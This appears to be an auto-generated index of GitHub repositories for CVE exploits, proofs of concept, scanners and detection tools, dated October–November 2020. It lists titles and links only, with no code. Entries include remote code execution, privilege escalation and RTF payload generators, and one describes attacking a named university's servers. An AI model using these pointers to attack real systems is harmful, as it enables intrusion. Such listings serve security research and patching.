**Playground Sessions - Storing User Credentials in Plaintext** : [nathunandwani/CVE-2020-24227](https://github.com/nathunandwani/CVE-2020-24227) create time: 2020-11-21T12:55:42Z

**Outlook 2019 Remote Command Execution** : [MasterSploit/CVE-2020-16947](https://github.com/MasterSploit/CVE-2020-16947) create time: 2020-11-21T08:58:32Z

**no description** : [blackmarketer/CVE-2020-13942](https://github.com/blackmarketer/CVE-2020-13942) create time: 2020-11-21T08:48:46Z

**Script that automates the process of escalating privileges on openbsd system (CVE-2019-19520) by exploiting the xlock binary and againing it's sgid and escalating to the root user by (CVE-2019-19522) exploiting the privileges of auth group and adding keys to the Skey or Yubikey** : [retrymp3/Openbsd-Privilege-Escalation](https://github.com/retrymp3/Openbsd-Privilege-Escalation) create time: 2020-11-21T07:30:10Z

**CVE-2020-13942 POC + Automation Script** : [shifa123/CVE-2020-13942-POC-](https://github.com/shifa123/CVE-2020-13942-POC-) create time: 2020-11-20T23:25:44Z

**GitLab 12.9.0 Arbitrary File Read** : [thewhiteh4t/cve-2020-10977](https://github.com/thewhiteh4t/cve-2020-10977) create time: 2020-11-20T15:40:03Z

**no description** : [MasterSploit/LPE---CVE-2020-0796](https://github.com/MasterSploit/LPE---CVE-2020-0796) create time: 2020-11-20T09:00:08Z

**This repo has a blog post about my analysis for CVE-2018-19987 an authenticated OS command injection affecting multiple D-Link routers** : [nahueldsanchez/blogpost_cve-2018-19987-analysis](https://github.com/nahueldsanchez/blogpost_cve-2018-19987-analysis) create time: 2020-11-19T23:01:11Z

**FortiVuln** : [k4nfr3/CVE-2018-13379-Fortinet](https://github.com/k4nfr3/CVE-2018-13379-Fortinet) create time: 2020-11-19T21:22:25Z

**Weblogic SearchPublicRegistries SSRF(CVE-2014-4210) Exploit Script based on Python3** : [NHPT/WebLogic-SSRF_CVE-2014-4210](https://github.com/NHPT/WebLogic-SSRF_CVE-2014-4210) create time: 2020-11-19T16:06:57Z

**CVE-2020-13942 unauthenticated RCE POC through MVEL and OGNL injection** : [eugenebmx/CVE-2020-13942](https://github.com/eugenebmx/CVE-2020-13942) create time: 2020-11-19T08:22:17Z

**CVE-2020-3452** : [grim3/CVE-2020-3452](https://github.com/grim3/CVE-2020-3452) create time: 2020-11-18T21:31:50Z

**no description** : [masahiro331/CVE-2020-8277](https://github.com/masahiro331/CVE-2020-8277) create time: 2020-11-18T10:57:13Z

**no description** : [lp008/CVE-2020-13942](https://github.com/lp008/CVE-2020-13942) create time: 2020-11-18T10:29:47Z

**PHP-FPM Remote Command Execution Exploit** : [lindemer/CVE-2019-11043](https://github.com/lindemer/CVE-2019-11043) create time: 2020-11-18T07:25:37Z

**CVE-2017-10271** : [Al1ex/CVE-2017-10271](https://github.com/Al1ex/CVE-2017-10271) create time: 2020-11-18T02:31:18Z

**CVE-2017-3506** : [Al1ex/CVE-2017-3506](https://github.com/Al1ex/CVE-2017-3506) create time: 2020-11-18T01:50:47Z

**DHCP exploitation with DynoRoot (CVE-2018-1111)** : [baldassarreFe/FEP3370-advanced-ethical-hacking](https://github.com/baldassarreFe/FEP3370-advanced-ethical-hacking) create time: 2020-11-17T19:10:29Z

**no description** : [BabyTeam1024/CVE-2020-14882](https://github.com/BabyTeam1024/CVE-2020-14882) create time: 2020-11-17T14:23:23Z

**A Remote Code Execution (RCE) exploit for Huawei HG532d based on CVE-2017-17215 vulnerability. Modded from original PoC code from exploit-db.com** : [wilfred-wulbou/HG532d-RCE-Exploit](https://github.com/wilfred-wulbou/HG532d-RCE-Exploit) create time: 2020-11-17T11:22:20Z

**该脚本为Citrix XenMobile 目录遍历漏洞(CVE-2020-8209)批量检测脚本。** : [B1anda0/CVE-2020-8209](https://github.com/B1anda0/CVE-2020-8209) create time: 2020-11-17T07:20:46Z

**windows.vm** : [yuehanked/cve-2019-3396](https://github.com/yuehanked/cve-2019-3396) create time: 2020-11-17T02:01:48Z

**generate RTF exploit payload. uses cve-2017-11882, cve-2017-8570, cve-2018-0802, and cve-2018-8174.** : [dcsync/rtfkit](https://github.com/dcsync/rtfkit) create time: 2020-11-16T22:21:54Z

**no description** : [b1ack0wl/CVE-2020-1472](https://github.com/b1ack0wl/CVE-2020-1472) create time: 2020-11-16T17:24:25Z

**Advisory for CVE-2020-28054 & stack based buffer overflow in IBM Tivoli Storage Manager** : [VoidSec/Tivoli-Madness](https://github.com/VoidSec/Tivoli-Madness) create time: 2020-11-16T09:27:33Z

**no description** : [nex1less/CVE-2015-4852](https://github.com/nex1less/CVE-2015-4852) create time: 2020-11-16T05:30:04Z

**CVE-2020-15227 checker** : [filipsedivy/CVE-2020-15227](https://github.com/filipsedivy/CVE-2020-15227) create time: 2020-11-15T15:30:01Z

**no description** : [jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041](https://github.com/jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041) create time: 2020-11-15T01:23:12Z

**PoC for CVE-2020-16012, a timing side channel in drawImage in Firefox & Chrome** : [aleksejspopovs/cve-2020-16012](https://github.com/aleksejspopovs/cve-2020-16012) create time: 2020-11-14T21:32:15Z

**no description** : [kukudechen-chen/cve-2020-1938](https://github.com/kukudechen-chen/cve-2020-1938) create time: 2020-11-14T13:55:58Z

**PoC for CVE-2020-25705 POC-2020-25705** : [tdwyer/CVE-2020-25705](https://github.com/tdwyer/CVE-2020-25705) create time: 2020-11-14T08:53:13Z

**no description** : [ORCA666/CVE-2019-0708](https://github.com/ORCA666/CVE-2019-0708) create time: 2020-11-14T08:51:31Z

**GOG Galaxy Local Privilege Escalation** : [lagartojuancho/CVE-2020-25769](https://github.com/lagartojuancho/CVE-2020-25769) create time: 2020-11-13T17:42:40Z

**Exploit for Laravel Remote Code Execution with API_KEY (CVE-2018-15133)** : [aljavier/exploit_laravel_cve-2018-15133](https://github.com/aljavier/exploit_laravel_cve-2018-15133) create time: 2020-11-13T16:33:52Z

**CVE-2020-25213 Wordpress File Manager 6.7 Plugin 0day exploit** : [kakamband/WPKiller](https://github.com/kakamband/WPKiller) create time: 2020-11-13T14:47:27Z

**Vulnerability Description of CVE-2020-15349** : [Traxes/Forklift_LPE](https://github.com/Traxes/Forklift_LPE) create time: 2020-11-13T12:20:07Z

**no description** : [rvermeulen/apache-struts-cve-2017-9805](https://github.com/rvermeulen/apache-struts-cve-2017-9805) create time: 2020-11-13T12:04:32Z

**no description** : [umiterkol/CVE-2020-8165--Auto-Shell](https://github.com/umiterkol/CVE-2020-8165--Auto-Shell) create time: 2020-11-13T09:01:12Z

**Hikvision IP camera access bypass exploit, developed by golang.** : [MisakaMikato/cve-2017-7921-golang](https://github.com/MisakaMikato/cve-2017-7921-golang) create time: 2020-11-13T04:15:31Z

**no description** : [jet-pentest/CVE-2020-28415](https://github.com/jet-pentest/CVE-2020-28415) create time: 2020-11-12T13:32:23Z

**no description** : [jet-pentest/CVE-2020-28414](https://github.com/jet-pentest/CVE-2020-28414) create time: 2020-11-12T13:31:50Z

**Fix CVE-2020-15228 (set-env, add-path in Github-Actions)** : [guettli/fix-CVE-2020-15228](https://github.com/guettli/fix-CVE-2020-15228) create time: 2020-11-12T11:59:47Z

**no description** : [x51/CVE-2020-14882](https://github.com/x51/CVE-2020-14882) create time: 2020-11-12T11:27:39Z

**A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。** : [zev3n/Ubuntu-Gnome-privilege-escalation](https://github.com/zev3n/Ubuntu-Gnome-privilege-escalation) create time: 2020-11-12T09:58:42Z

**海康威视未授权访问检测poc及口令爆破** : [BurnyMcDull/CVE-2017-7921](https://github.com/BurnyMcDull/CVE-2017-7921) create time: 2020-11-12T09:02:10Z

**A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server** : [t0rt3ll1n0/PCmanBoF](https://github.com/t0rt3ll1n0/PCmanBoF) create time: 2020-11-12T08:20:35Z

**Detection of RCE in Oracle's WebLogic Server CVE-2020-14882 / CVE-2020-14750** : [corelight/CVE-2020-14882-weblogicRCE](https://github.com/corelight/CVE-2020-14882-weblogicRCE) create time: 2020-11-12T06:59:54Z

**no description** : [MuirlandOracle/CVE-2014-6271-IPFire](https://github.com/MuirlandOracle/CVE-2014-6271-IPFire) create time: 2020-11-12T04:12:55Z

**Apache Tomcat CGIServlet RCE** : [0xmanjoos/CVE-2019-0232](https://github.com/0xmanjoos/CVE-2019-0232) create time: 2020-11-12T04:06:30Z

**no description** : [zavke/CVE-2020-10189-ManageEngine](https://github.com/zavke/CVE-2020-10189-ManageEngine) create time: 2020-11-12T02:36:09Z

**no description** : [azzzzzzzzzzzzzzzzz/CVE-2018-6574](https://github.com/azzzzzzzzzzzzzzzzz/CVE-2018-6574) create time: 2020-11-11T09:34:22Z

**Weblogic 身份认证绕过漏洞批量检测脚本** : [B1anda0/CVE-2020-14883](https://github.com/B1anda0/CVE-2020-14883) create time: 2020-11-11T08:52:28Z

**Jackson-databind远程代码执行漏洞(CVE-2020-8840)分析复现环境代码** : [Veraxy00/CVE-2020-8840](https://github.com/Veraxy00/CVE-2020-8840) create time: 2020-11-11T07:53:21Z

**基于qt的图形化CVE-2020-14882漏洞回显测试工具.** : [AirEvan/CVE-2020-14882-GUI-Test](https://github.com/AirEvan/CVE-2020-14882-GUI-Test) create time: 2020-11-11T06:52:32Z

**no description** : [billHuangPY/CVE-2020](https://github.com/billHuangPY/CVE-2020) create time: 2020-11-11T03:38:00Z

**The following is the outcome of playing with CVE-2020-1472 and attempting to automate the process of gaining a shell on the DC** : [JayP232/The_big_Zero](https://github.com/JayP232/The_big_Zero) create time: 2020-11-10T22:29:56Z

**Static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts** : [Qazeer/dirkjanm_CVE-2020-1472_static_binaries](https://github.com/Qazeer/dirkjanm_CVE-2020-1472_static_binaries) create time: 2020-11-10T21:35:15Z

**Proof of Concept of Libreoffice file exfiltration vulnerability in Big Blue Button** : [hannob/CVE-2020-27603-bbb-libreoffice-poc](https://github.com/hannob/CVE-2020-27603-bbb-libreoffice-poc) create time: 2020-11-10T20:26:44Z

**Dicha vulnerabilidad se presentaba en la funcionalidad mc_project_get_users, y su detección es tan solo modificando y enviando el parámetro “access” sin ningún valor y cambiando el tipo de valor a String.** : [EthicalHCOP/CVE-2020-28413_Mantis2.24.3-SQLi-SOAP](https://github.com/EthicalHCOP/CVE-2020-28413_Mantis2.24.3-SQLi-SOAP) create time: 2020-11-10T16:50:55Z

**CVE-2020-23968** : [ricardojba/CVE-2020-23968-ILEX-SignGo-EoP](https://github.com/ricardojba/CVE-2020-23968-ILEX-SignGo-EoP) create time: 2020-11-10T14:39:20Z

**Early 2019 - late 2020. R.I.P. CVE-2020-12928 https://h0mbre.github.io/RyzenMaster_CVE/#** : [ekknod/EC_PRO-LAN](https://github.com/ekknod/EC_PRO-LAN) create time: 2020-11-10T13:08:21Z

**no description** : [ngpentest007/CVE-2019-7357](https://github.com/ngpentest007/CVE-2019-7357) create time: 2020-11-10T06:07:42Z

**no description** : [HaoJame/CVE-2017-11882](https://github.com/HaoJame/CVE-2017-11882) create time: 2020-11-10T04:13:53Z

**no description** : [datntsec/CVE-2020-0796](https://github.com/datntsec/CVE-2020-0796) create time: 2020-11-10T02:35:34Z

**no description** : [MuirlandOracle/CVE-2019-15107](https://github.com/MuirlandOracle/CVE-2019-15107) create time: 2020-11-09T21:46:57Z

**no description** : [kkhacklabs/CVE-2020-14750](https://github.com/kkhacklabs/CVE-2020-14750) create time: 2020-11-09T17:58:11Z

**[CVE-2020-14882] Oracle WebLogic Server Authenticated Remote Code Execution (RCE)** : [murataydemir/CVE-2020-14883](https://github.com/murataydemir/CVE-2020-14883) create time: 2020-11-09T15:26:28Z

**[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass** : [murataydemir/CVE-2020-14882](https://github.com/murataydemir/CVE-2020-14882) create time: 2020-11-09T13:02:43Z

**my exp for CVE-2020-27194, tested on linux kernel 5.8.14.** : [xmzyshypnc/CVE-2020-27194](https://github.com/xmzyshypnc/CVE-2020-27194) create time: 2020-11-09T11:58:34Z

**An automated PoC for CVE 2018-15133** : [AlienX2001/better-poc-for-CVE-2018-15133](https://github.com/AlienX2001/better-poc-for-CVE-2018-15133) create time: 2020-11-09T08:44:27Z

**no description** : [QmF0c3UK/CVE-2020-14882](https://github.com/QmF0c3UK/CVE-2020-14882) create time: 2020-11-09T08:03:44Z

**no description** : [mooneee/cve-2020-7897](https://github.com/mooneee/cve-2020-7897) create time: 2020-11-07T16:20:45Z

**CVE-2020-28351 - Reflected Cross-Site Scripting attack in ShoreTel version 19.46.1802.0.** : [dievus/CVE-2020-28351](https://github.com/dievus/CVE-2020-28351) create time: 2020-11-06T18:49:47Z

**PoC para las vulnerabilidades CVE-2020-14750 y cve-2020-14882** : [pprietosanchez/CVE-2020-14750](https://github.com/pprietosanchez/CVE-2020-14750) create time: 2020-11-06T12:46:03Z

**no description** : [AaronWilsonGrylls/CVE-2019-0708-POC](https://github.com/AaronWilsonGrylls/CVE-2019-0708-POC) create time: 2020-11-06T07:13:30Z

**CVE-2020-0796-POC** : [AaronWilsonGrylls/CVE-2020-0796-POC](https://github.com/AaronWilsonGrylls/CVE-2020-0796-POC) create time: 2020-11-06T03:56:52Z

**Writeup on CVE-2020-28328: SuiteCRM Log File Remote Code Execution plus some bonus Cross-Site Scripting** : [mcorybillington/SuiteCRM-RCE](https://github.com/mcorybillington/SuiteCRM-RCE) create time: 2020-11-06T00:56:36Z

**some files created during analysis of ProFTPd vulnerability - no exploit created yet** : [ptef/CVE-2020-9273](https://github.com/ptef/CVE-2020-9273) create time: 2020-11-05T20:22:40Z

**no description** : [mingchen-script/CVE-2020-1472-visualizer](https://github.com/mingchen-script/CVE-2020-1472-visualizer) create time: 2020-11-05T15:17:14Z

**no description** : [mmioimm/cve-2020-14882](https://github.com/mmioimm/cve-2020-14882) create time: 2020-11-05T13:12:28Z

**Re-implementation of VirtueSecurity's benigncertain-monitor** : [3ndG4me/CVE-2016-6415-BenignCertain-Monitor](https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor) create time: 2020-11-04T20:08:14Z

**no description** : [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go) create time: 2020-11-04T16:43:04Z

**no description** : [willinin/CVE-2020-27194-exp](https://github.com/willinin/CVE-2020-27194-exp) create time: 2020-11-04T12:02:34Z

**rConfig 3.9 EDB-ID: 48208 CVE: 2020-10220 WEBAPPS** : [arvind2022/isac_rconfig3.9](https://github.com/arvind2022/isac_rconfig3.9) create time: 2020-11-04T04:22:40Z

**CVE-2020-14882/14883/14750** : [NS-Sp4ce/CVE-2020-14882](https://github.com/NS-Sp4ce/CVE-2020-14882) create time: 2020-11-04T03:09:13Z

**Elevation Of Privileges Proof of Concept for Windows (win7-win10)** : [TinToSer/CVE2020-17087](https://github.com/TinToSer/CVE2020-17087) create time: 2020-11-03T22:08:34Z

**Git-lfs RCE exploit CVE-2020-27955 - tested on Windows on: git, gh cli, GitHub Desktop, Visual Studio, SourceTree etc.** : [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955) create time: 2020-11-03T17:14:22Z

**CVE-2020-14882 detection script** : [ovProphet/CVE-2020-14882-checker](https://github.com/ovProphet/CVE-2020-14882-checker) create time: 2020-11-03T11:34:38Z

**A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.** : [kkent030315/CVE-2017-9769](https://github.com/kkent030315/CVE-2017-9769) create time: 2020-11-03T10:58:53Z

**CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。** : [GGyao/CVE-2020-14882_ALL](https://github.com/GGyao/CVE-2020-14882_ALL) create time: 2020-11-03T10:49:35Z

**no description** : [Yashrk078/Test_CVE-2018-6574](https://github.com/Yashrk078/Test_CVE-2018-6574) create time: 2020-11-03T10:47:24Z

**no description** : [ngpentest007/CVE-2019-7356](https://github.com/ngpentest007/CVE-2019-7356) create time: 2020-11-03T07:04:15Z

**no description** : [ossf-cve-benchmark/CVE-2020-7752](https://github.com/ossf-cve-benchmark/CVE-2020-7752) create time: 2020-11-02T20:55:15Z

**no description** : [ossf-cve-benchmark/CVE-2020-11059](https://github.com/ossf-cve-benchmark/CVE-2020-11059) create time: 2020-11-02T20:55:12Z

**no description** : [ossf-cve-benchmark/CVE-2020-11022](https://github.com/ossf-cve-benchmark/CVE-2020-11022) create time: 2020-11-02T20:55:10Z

**no description** : [ossf-cve-benchmark/CVE-2019-10765](https://github.com/ossf-cve-benchmark/CVE-2019-10765) create time: 2020-11-02T20:55:08Z

**no description** : [ossf-cve-benchmark/CVE-2019-10745](https://github.com/ossf-cve-benchmark/CVE-2019-10745) create time: 2020-11-02T20:55:05Z

**no description** : [ossf-cve-benchmark/CVE-2018-8035](https://github.com/ossf-cve-benchmark/CVE-2018-8035) create time: 2020-11-02T20:54:14Z

**Exploit for WebSocket Vulnerability in Apache Tomcat** : [RedTeamPentesting/CVE-2020-13935](https://github.com/RedTeamPentesting/CVE-2020-13935) create time: 2020-11-02T14:48:55Z

**no description** : [Elbarbons/Attacco-ROCA-sulla-vulnerabilita-CVE-2017-15361](https://github.com/Elbarbons/Attacco-ROCA-sulla-vulnerabilita-CVE-2017-15361) create time: 2020-11-02T14:12:37Z

**CVE-2020-27358 and CVE-2020-27359** : [seb1055/cve-2020-27358-27359](https://github.com/seb1055/cve-2020-27358-27359) create time: 2020-11-02T04:54:52Z

**(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script** : [ludy-dev/Weblogic_Unauthorized-bypass-RCE](https://github.com/ludy-dev/Weblogic_Unauthorized-bypass-RCE) create time: 2020-11-01T13:12:27Z

**Exploiting CVE-2014-3153, AKA Towelroot.** : [elongl/CVE-2014-3153](https://github.com/elongl/CVE-2014-3153) create time: 2020-10-31T11:39:11Z

**CVE-2020-13277 靶场: Gitlab 逻辑漏洞 - 任意用户越权访问私有仓库** : [lyy289065406/CVE-2020-13277](https://github.com/lyy289065406/CVE-2020-13277) create time: 2020-10-31T11:01:26Z

**speedfan** : [y5s5k5/CVE-2020-28175](https://github.com/y5s5k5/CVE-2020-28175) create time: 2020-10-31T06:53:41Z

**CVE-2020-14882批量验证工具。** : [GGyao/CVE-2020-14882_POC](https://github.com/GGyao/CVE-2020-14882_POC) create time: 2020-10-31T01:43:54Z

**PoC for CVE-2020-14882** : [sickwell/CVE-2020-14882](https://github.com/sickwell/CVE-2020-14882) create time: 2020-10-30T18:46:34Z

**Solr RCE CVE-2019-17558** : [pan3a/Solr-CVE-2019-17558](https://github.com/pan3a/Solr-CVE-2019-17558) create time: 2020-10-30T16:57:43Z

**osCommerce Phoenix CE <=1.0.5.4 Authenticated RCE** : [k0rnh0li0/CVE-2020-27976](https://github.com/k0rnh0li0/CVE-2020-27976) create time: 2020-10-30T13:59:23Z

**no description** : [alexfrancow/CVE-2020-14882](https://github.com/alexfrancow/CVE-2020-14882) create time: 2020-10-30T11:07:11Z

**CuteNews Avatar 2.1.2 Remote Code Execution Vulnerability** : [khuntor/CVE-2019-11447-EXP](https://github.com/khuntor/CVE-2019-11447-EXP) create time: 2020-10-30T08:21:46Z

**no description** : [rockysec/CVE-2018-11236](https://github.com/rockysec/CVE-2018-11236) create time: 2020-10-30T00:13:53Z

**GCHQ Stroom is vulnerable to Cross-Site Scripting due to the ability to load the Stroom dashboard on another site and insufficient protection against window event origins.** : [RepublicR0K/CVE-2019-10779](https://github.com/RepublicR0K/CVE-2019-10779) create time: 2020-10-29T21:56:32Z

**CVE-2020-14882 EXP 回显** : [wsfengfan/cve-2020-14882](https://github.com/wsfengfan/cve-2020-14882) create time: 2020-10-29T15:44:23Z

**Scans for Microsoft Exchange Versions with masscan** : [SLSteff/CVE-2020-0688-Scanner](https://github.com/SLSteff/CVE-2020-0688-Scanner) create time: 2020-10-29T15:16:24Z

**Bash script to exploit the Oracle's Weblogic Unauthenticated Remote Command Execution - CVE-2020-14882** : [0thm4n3/cve-2020-14882](https://github.com/0thm4n3/cve-2020-14882) create time: 2020-10-29T13:53:31Z

**Possible Account Takeover | Brute Force Ability** : [jet-pentest/CVE-2020-27747](https://github.com/jet-pentest/CVE-2020-27747) create time: 2020-10-29T09:06:24Z

**CVE-2020-14882 Weblogic-Exp** : [RedTeamWing/CVE-2020-14882](https://github.com/RedTeamWing/CVE-2020-14882) create time: 2020-10-29T06:30:30Z

**(patched) This targets McMaster University's website and takes advantage of CVE-2020-14882 in the outdated version of WebLogic Server (12.2.1.3.0), which is present in the university's subdomains, mosaic.mcmaster.ca and epprd.uts.mcmaster.ca.** : [Umarovm/-Patched-McMaster-University-Blind-Command-Injection](https://github.com/Umarovm/-Patched-McMaster-University-Blind-Command-Injection) create time: 2020-10-29T01:28:41Z

**CVE-2020–14882 by Jang** : [s1kr10s/CVE-2020-14882](https://github.com/s1kr10s/CVE-2020-14882) create time: 2020-10-28T21:28:12Z

**EasyAntiCheat minifilter, thread and image callback bypass** : [dec-h4xu3lyn/CVEAC-2020-0002](https://github.com/dec-h4xu3lyn/CVEAC-2020-0002) create time: 2020-10-28T19:19:08Z

**CVE-2020-15999** : [marcinguy/CVE-2020-15999](https://github.com/marcinguy/CVE-2020-15999) create time: 2020-10-28T16:16:25Z

**CVE-2020–14882、CVE-2020–14883** : [jas502n/CVE-2020-14882](https://github.com/jas502n/CVE-2020-14882) create time: 2020-10-28T11:43:37Z

**CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC** : [komomon/CVE-2020-16898--EXP-POC](https://github.com/komomon/CVE-2020-16898--EXP-POC) create time: 2020-10-28T11:25:58Z

**Windows 7 LPE** : [Graham382/CVE-2020-1054](https://github.com/Graham382/CVE-2020-1054) create time: 2020-10-28T00:48:43Z

**PoC for old Binder vulnerability (based on P0 exploit)** : [c3r34lk1ll3r/CVE-2019-2215](https://github.com/c3r34lk1ll3r/CVE-2019-2215) create time: 2020-10-27T14:43:17Z

**cve-2020-15148** : [0xkami/cve-2020-15148](https://github.com/0xkami/cve-2020-15148) create time: 2020-10-27T07:33:47Z

**POC For CVE-2020-1481 - Jira Username Enumerator/Validator** : [Rival420/CVE-2020-14181](https://github.com/Rival420/CVE-2020-14181) create time: 2020-10-26T17:07:28Z

**Python exploit for CVE-2012-2982** : [OstojaOfficial/CVE-2012-2982](https://github.com/OstojaOfficial/CVE-2012-2982) create time: 2020-10-25T23:37:32Z

**PoC exploit for CVE-2018-11235 allowing RCE on git clone --recurse-submodules** : [jongmartinez/CVE-2018-11235-PoC](https://github.com/jongmartinez/CVE-2018-11235-PoC) create time: 2020-10-25T15:58:40Z

**Pulse Secure VPN mitm Research - CVE-2020-8241, CVE-2020-8239** : [withdk/pulse-secure-vpn-mitm-research](https://github.com/withdk/pulse-secure-vpn-mitm-research) create time: 2020-10-25T15:58:02Z

**no description** : [vhok74/cve-2018-3295](https://github.com/vhok74/cve-2018-3295) create time: 2020-10-25T07:33:29Z

**no description** : [kursataker/cve303_fall_2020](https://github.com/kursataker/cve303_fall_2020) create time: 2020-10-23T16:01:43Z

**CVE-2020-27688** : [matthiasmaes/CVE-2020-27688](https://github.com/matthiasmaes/CVE-2020-27688) create time: 2020-10-23T06:02:28Z

**CVE-2020-0688 PoC** : [zyn3rgy/ecp_slap](https://github.com/zyn3rgy/ecp_slap) create time: 2020-10-23T01:18:13Z

**PoC for apache struts 2 vuln cve-2019-0230** : [f8al/CVE-2019-0230-PoC](https://github.com/f8al/CVE-2019-0230-PoC) create time: 2020-10-22T17:55:10Z

**CVE-2018-19859 Remote Code Execution Proof of Concept** : [WhiteOakSecurity/CVE-2018-19859](https://github.com/WhiteOakSecurity/CVE-2018-19859) create time: 2020-10-22T17:05:11Z

**A simple POC for CVE-2018-6574** : [jongmartinez/CVE-2018-6574-POC](https://github.com/jongmartinez/CVE-2018-6574-POC) create time: 2020-10-22T03:35:44Z

**Bypassing NTFS permissions to read any files as unprivileged user.** : [ioncodes/CVE-2020-16938](https://github.com/ioncodes/CVE-2020-16938) create time: 2020-10-21T15:38:22Z

**no description** : [Elsfa7-110/CVE-2019-1579](https://github.com/Elsfa7-110/CVE-2019-1579) create time: 2020-10-21T12:30:42Z

**no description** : [HYWZ36/CVE-2020-14645-code](https://github.com/HYWZ36/CVE-2020-14645-code) create time: 2020-10-21T10:47:07Z

**Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass Exploit/PoC** : [ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass](https://github.com/ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass) create time: 2020-10-21T10:13:51Z

**no description** : [luuquy/DecryptRawdata_CVE_2019_18935](https://github.com/luuquy/DecryptRawdata_CVE_2019_18935) create time: 2020-10-21T09:43:12Z

**no description** : [puckiestyle/CVE-2020-1472](https://github.com/puckiestyle/CVE-2020-1472) create time: 2020-10-21T09:42:34Z

**cve-2020-14644 漏洞环境** : [0xkami/cve-2020-14644](https://github.com/0xkami/cve-2020-14644) create time: 2020-10-20T08:25:40Z

**CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC** : [komomon/CVE-2020-16898-EXP-POC](https://github.com/komomon/CVE-2020-16898-EXP-POC) create time: 2020-10-20T05:24:47Z

**ThinkAdmin CVE-2020-25540 poc** : [Schira4396/CVE-2020-25540](https://github.com/Schira4396/CVE-2020-25540) create time: 2020-10-19T09:56:20Z

**no description** : [stealth-ronin/CVE-2017-0199-PY-KIT](https://github.com/stealth-ronin/CVE-2017-0199-PY-KIT) create time: 2020-10-18T20:24:38Z

**Exploits CuteNews 2.1.2 via poor file upload checks used when uploading an avatar image leading to RCE.** : [mt-code/CVE-2019-11447](https://github.com/mt-code/CVE-2019-11447) create time: 2020-10-18T13:49:55Z

**A POC for IBM Datapower Authenticated Redis RCE Exploit abusing the Test Message Function (CVE-2020-5014)** : [copethomas/datapower-redis-rce-exploit](https://github.com/copethomas/datapower-redis-rce-exploit) create time: 2020-10-18T10:32:32Z

**no description** : [HYWZ36/HYWZ36-CVE-2020-11989-code](https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code) create time: 2020-10-18T08:34:47Z

**no description** : [SplendidSky/CVE-2020-8835](https://github.com/SplendidSky/CVE-2020-8835) create time: 2020-10-18T03:17:58Z

**no description** : [momika233/CVE-2020-16898-exp](https://github.com/momika233/CVE-2020-16898-exp) create time: 2020-10-17T13:52:08Z

**Check all Network Interfaces for CVE-2020-16898 Vulnerability** : [CPO-EH/CVE-2020-16898_Checker](https://github.com/CPO-EH/CVE-2020-16898_Checker) create time: 2020-10-17T10:23:56Z

**Detect vulns liferay CVE-2020-7961 by Nattroc (EOG Team)** : [shacojx/GLiferay-CVE-2020-7961-golang](https://github.com/shacojx/GLiferay-CVE-2020-7961-golang) create time: 2020-10-17T08:32:51Z

**no description** : [Ken-Abruzzi/cve_2020_16947](https://github.com/Ken-Abruzzi/cve_2020_16947) create time: 2020-10-17T08:05:45Z

**PowerShell Script Workaround for VCE-220-16898 Vulnerability** : [CPO-EH/CVE-2020-16898_Workaround](https://github.com/CPO-EH/CVE-2020-16898_Workaround) create time: 2020-10-17T07:09:58Z

**PoC BSOD for CVE-2020-16898** : [jiansiting/cve-2020-16898](https://github.com/jiansiting/cve-2020-16898) create time: 2020-10-17T04:32:11Z

**C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon** : [CPO-EH/CVE-2020-1472_ZeroLogonChecker](https://github.com/CPO-EH/CVE-2020-1472_ZeroLogonChecker) create time: 2020-10-17T00:14:08Z

**PoC BSOD for CVE-2020-16898 (badneighbor)** : [0xeb-bp/cve-2020-16898](https://github.com/0xeb-bp/cve-2020-16898) create time: 2020-10-16T23:03:15Z

**Converted with tweaks from a metasploit module as an exercise for OSCP studying and exploit development** : [cd6629/CVE-2015-3306-Python-PoC](https://github.com/cd6629/CVE-2015-3306-Python-PoC) create time: 2020-10-16T19:58:13Z

**Windows RDNSS RCE** : [bkerler/CVE-2020-16899](https://github.com/bkerler/CVE-2020-16899) create time: 2020-10-16T10:44:22Z

**PoC Bad Neighbor BSOD exploit** : [Q1984/CVE-2020-16898](https://github.com/Q1984/CVE-2020-16898) create time: 2020-10-16T06:27:24Z

**no description** : [Security-AVS/CVE-2019-13633](https://github.com/Security-AVS/CVE-2019-13633) create time: 2020-10-15T15:19:58Z

**Check for events that indicate non compatible devices -> CVE-2020-1472** : [maikelnight/zerologon](https://github.com/maikelnight/zerologon) create time: 2020-10-15T15:02:53Z

**CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920** : [squid22/Webmin_CVE-2019-15107](https://github.com/squid22/Webmin_CVE-2019-15107) create time: 2020-10-15T14:53:48Z

**PoC of CVE-2020-16947 (Microsoft Outlook RCE vulnerablility)** : [0neb1n/CVE-2020-16947](https://github.com/0neb1n/CVE-2020-16947) create time: 2020-10-15T14:32:25Z

**no description** : [Security-AVS/CVE-2020-16270](https://github.com/Security-AVS/CVE-2020-16270) create time: 2020-10-15T14:06:28Z

**no description** : [FancyDoesSecurity/CVE-2020-2883](https://github.com/FancyDoesSecurity/CVE-2020-2883) create time: 2020-10-14T23:12:39Z

**Zeek detection for CVE-2020-16898-"Bad Neighbor"** : [initconf/CVE-2020-16898-Bad-Neighbor](https://github.com/initconf/CVE-2020-16898-Bad-Neighbor) create time: 2020-10-14T21:25:09Z

